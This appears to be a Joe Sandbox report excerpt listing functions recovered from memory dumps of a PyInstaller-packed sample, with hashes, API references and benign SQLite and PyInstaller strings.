                                                                                                                                                                                                                                • Instruction ID: 4b22ff078bd96c74a32b0ea7f5d5faa8b45bed7db56762d5cd1ed121eabfaf60
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 907d55e51c7058cb158fe87907fe270dc46d94b6a55033e43f7ec2f1ab85e8f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BC1C425B19A8286EB18CB5594A0A7967E0FF55BA0F444775EE7E0B7E9CF3CE4408340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 1405196051-3727861699
                                                                                                                                                                                                                                • Opcode ID: a288532d659f958d16e14da1c3b3fb0a3d980919a3d3362a77c99815c8e34165
                                                                                                                                                                                                                                • Instruction ID: b6ada68d219ed7f10d5419822a3f0bdadd8250b209ddd5f54bd01fc0fc31267b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a288532d659f958d16e14da1c3b3fb0a3d980919a3d3362a77c99815c8e34165
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CB11272B0D2D685D7289B189460ABE7B91FB81780F054275DB9A877C9DF3EE044D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                • API String ID: 1405196051-2063813899
                                                                                                                                                                                                                                • Opcode ID: 04c7ac160417419a773f1a03789a70658ed0dc70c10830113a31aabe6f2124d7
                                                                                                                                                                                                                                • Instruction ID: 5fd9674dc7207cc78d5fff917e59d88da0ce22782ebb850bb64caeb52817c09a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04c7ac160417419a773f1a03789a70658ed0dc70c10830113a31aabe6f2124d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C91E262B19B8182EB54CF11A424AB977E1FF89B90F454275EEAD4B799EF3CE441C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 1405196051-3727861699
                                                                                                                                                                                                                                • Opcode ID: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
                                                                                                                                                                                                                                • Instruction ID: 34c0e7f96abc1991ee0287c1a3a73e5688460cfaf1e729c3f88943589a85fa46
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E91E262B082C286D718DB2695A0ABD77E0FB40B84F088176DBAE876D9DF3DF455D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                • API String ID: 1405196051-3727861699
                                                                                                                                                                                                                                • Opcode ID: 47932e3adf19c9dccdb3695a3e791271d07a0c4d778819a994211745928df37f
                                                                                                                                                                                                                                • Instruction ID: 33857b50e2b3fe28eec2ef356296a6c5892fb87438ea9310486974ec1a866af0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47932e3adf19c9dccdb3695a3e791271d07a0c4d778819a994211745928df37f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB81F3327086C28AE768AF29D464BAE77A4FB85784F008076EB9E477D9DF39D445C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction ID: c20a647caed65085ac9ef6587e4d0c427b5eeee04c72160e1ea21244308e7c28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2231B322B1CA815AE720B765BC926E66295BF887D8F440132EE8DD3B5DEF3CD5468300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                • Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                                • Instruction ID: a82264effe2ec24202ea947d750503a123ebcf04e50caae4233acd9fbfa6f3ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4831D866A1DA8289EB24FB61AC962F96360FF89B84F440135EE4D87A59EF3CD1458700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF64487918F,?,00007FF644873C55), ref: 00007FF644872BA0
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF644872C2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction ID: f9bf8b7b704f7107f9305663a7eec017aadffaf8da79c1e39107c88bd79daa05
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE218E62B0CB419AE710BB54F8967AA73A4FB88784F404136EE8D97B59EF3CD245C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF644871B99), ref: 00007FF644872760
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                • Instruction ID: f1062883099410325f6b43604b6ad7cfd12f1d3260681a5ed22c0c0078e9b403
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F216D32B1CB8186E720FB50B8927E66294BB88784F400135EE8C93A59DF7CD2458740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction ID: 40577bb7c6bfeb44d1998746ff6c2b4668a3fe741a893451acfb609e52a2faeb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F06261B0DB06C5EA10BB24E4C637A6360BF85761F540235DE6E866ECDF6DD484D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction ID: 2a3cb33d07c6d7ce1eacf8864a87d6596df5df05675b3a989bba9e6b98e5f527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4118222E5CE03CAFA64356DE4D33791250AF59360E081634EE6ED67EECE6FE8815100
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3AF
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3CE
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3F6
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B407
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B418
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                • Instruction ID: 99f5a9e2c2bbc384b88379fd951a1a590d0538946315b72c276934a069b0bbb4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF113A20F0D64289FA58B72599D327921815FC47B0F488734EE7ED66DEDE2CF8428301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                • Instruction ID: ac01e6505b14a9b000f88cec93a8ad75612aa772c9034d967890d4e6e7cc83bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60119320E4D2078DF969B36558D717A21424FC5771F184B34EE3EDA6DBDE2CF8418211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00007FFDFAF5A0B5,?,?,?), ref: 00007FFDFAF59A37
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                • API String ID: 1405196051-2903559916
                                                                                                                                                                                                                                • Opcode ID: 83c75c440adf2a9d1edf7cf93b27a2f3e27624414c59e452312b9623cb35f1b5
                                                                                                                                                                                                                                • Instruction ID: 4f268dc28e8008e0190659570c657dcd5a8e4ac229119e2e7babf5cb2c4fa748
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83c75c440adf2a9d1edf7cf93b27a2f3e27624414c59e452312b9623cb35f1b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74B1E726B0D78289FB2D9B1594A0BB96790EF41BA4F4946B5EE6D0B3D9DF3CE501C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction ID: 1f674e9f8a991638cdd11a2d3807376ee97b4782cdb607caecd41c26ae368c00
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A291CF22A0CA4689FB61BE24D49277D37A1AF40B94F444936DE5DE73DAEF3CE8458301
